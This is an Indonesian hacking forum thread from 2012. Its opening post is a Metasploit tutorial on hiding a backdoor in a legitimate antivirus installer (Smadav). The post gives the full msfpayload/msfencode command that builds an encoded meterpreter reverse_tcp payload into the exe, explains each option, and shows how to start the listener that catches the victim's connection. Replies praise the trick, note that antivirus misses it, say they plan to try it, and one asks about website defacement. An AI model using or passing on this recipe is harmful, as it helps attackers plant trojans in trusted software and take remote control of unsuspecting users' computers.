![]() |
Share Menyamarkan virus pada Antivirus Installer - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html) +---- Thread: Share Menyamarkan virus pada Antivirus Installer (/thread-4094.html) |
Menyamarkan virus pada Antivirus Installer - zee eichel - 11-30-2012 Tutorial kali ini adalah tentang bagaimana kita melakukan penyamaran backdoor yang kita sisipi di dalam sebuah file .exe windows dengan metasploit. Langsung sja gk perlu basa basi .. Untuk percobaan kli ini saya pakai sistem operasi dracos … hmm untuk peretas-peretas OS lainnya tinggal menyesuaikan saja. pertama-tama mari kita buat backdoor dengan menyisipkannya pada sebuah file exe .. kali ni saya pilih installer antivirus smadav download disini guys http://smadav.web.id/download/ klo sudah saatnya msfpayload salah satu andalan metasploit dalam sisi maintaining access memulai aksinya Code: root@dracos:~# cd /opt/metasploit-4.4.0/msf3 Code: root@dracos:/opt/metasploit-4.4.0/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.4 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x /root/Downloads/smadav91.exe -o /var/www/smadav91.exe Quote:[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)[*] dimana : - windows/meterpreter/reverse_tcp adalah tipe payload bisa di sesuikan dengan keperluan (meterpreter/bind) ( reverse_tcp, reverse_http, reverse_https) - LHOST ( localhost) adalah alamat IP kita - LPORT ( localport ) adalah port lokal yang akan kita gunakan dalam menjalankan listener ( reverse ) -c Jumlah enskripsi -t tipe backdoor -x posisi file exe yang hendak kita injeksi -o output hasil file yang telah di injeksi ( backdoor result ) kaborr Jangan lupa buat listener yah … Quote:root@dracos:~# msfconsole[*] [*] wew .. mari kita lihat penampakan jenis file ini pada kompi target … ![]() hmm sekilas terlihat sama persisi .. dan ketika korban melakukan esekusi .. its work like a charm happy Code: msf exploit(handler) > exploit [*] silahkan kreasikan backdoor dengan file-file exe yang lain .. selamat berkarya.. RE: Menyamarkan virus pada Antivirus Installer - jakkidz - 11-30-2012 wiidih.. ijin praktek ya om ![]() RE: Menyamarkan virus pada Antivirus Installer - iKONspirasi - 11-30-2012 wah berarti smadavnya ga bisa detek meterpreter ya om? surem haha +1 dari ane RE: Menyamarkan virus pada Antivirus Installer - stevennathaniel - 11-30-2012 itu kalau file smadav yg sudah di inject dengan payload di klik 2 kali, apakah proses instalasi smadav nya akan berjalan, atau akan muncul pesan error? itu kalau file smadav yg sudah di inject dengan payload di klik 2 kali, apakah proses instalasi smadav nya akan berjalan, atau akan muncul pesan error? RE: Menyamarkan virus pada Antivirus Installer - wahyuardan - 11-30-2012 makasih om ilmunya ![]() RE: Menyamarkan virus pada Antivirus Installer - xsan-lahci - 11-30-2012 wew keren om zee hahaha dirumah praktek aaah RE: Menyamarkan virus pada Antivirus Installer - Acenk90 - 11-30-2012 nice share om..., terus berbagi ya om..., ![]() :-bd RE: Menyamarkan virus pada Antivirus Installer - Al - Ayyubi - 12-01-2012 surem om wkwkwkwk . . asli nga kedetec wkwkwk . . . RE: Menyamarkan virus pada Antivirus Installer - tyokusuma - 12-02-2012 itu harus 1 wlan lagi ya om ?? atau work offline ?? RE: Menyamarkan virus pada Antivirus Installer - ardian - 12-02-2012 ayo2,, ada yg bisa deface ga ? |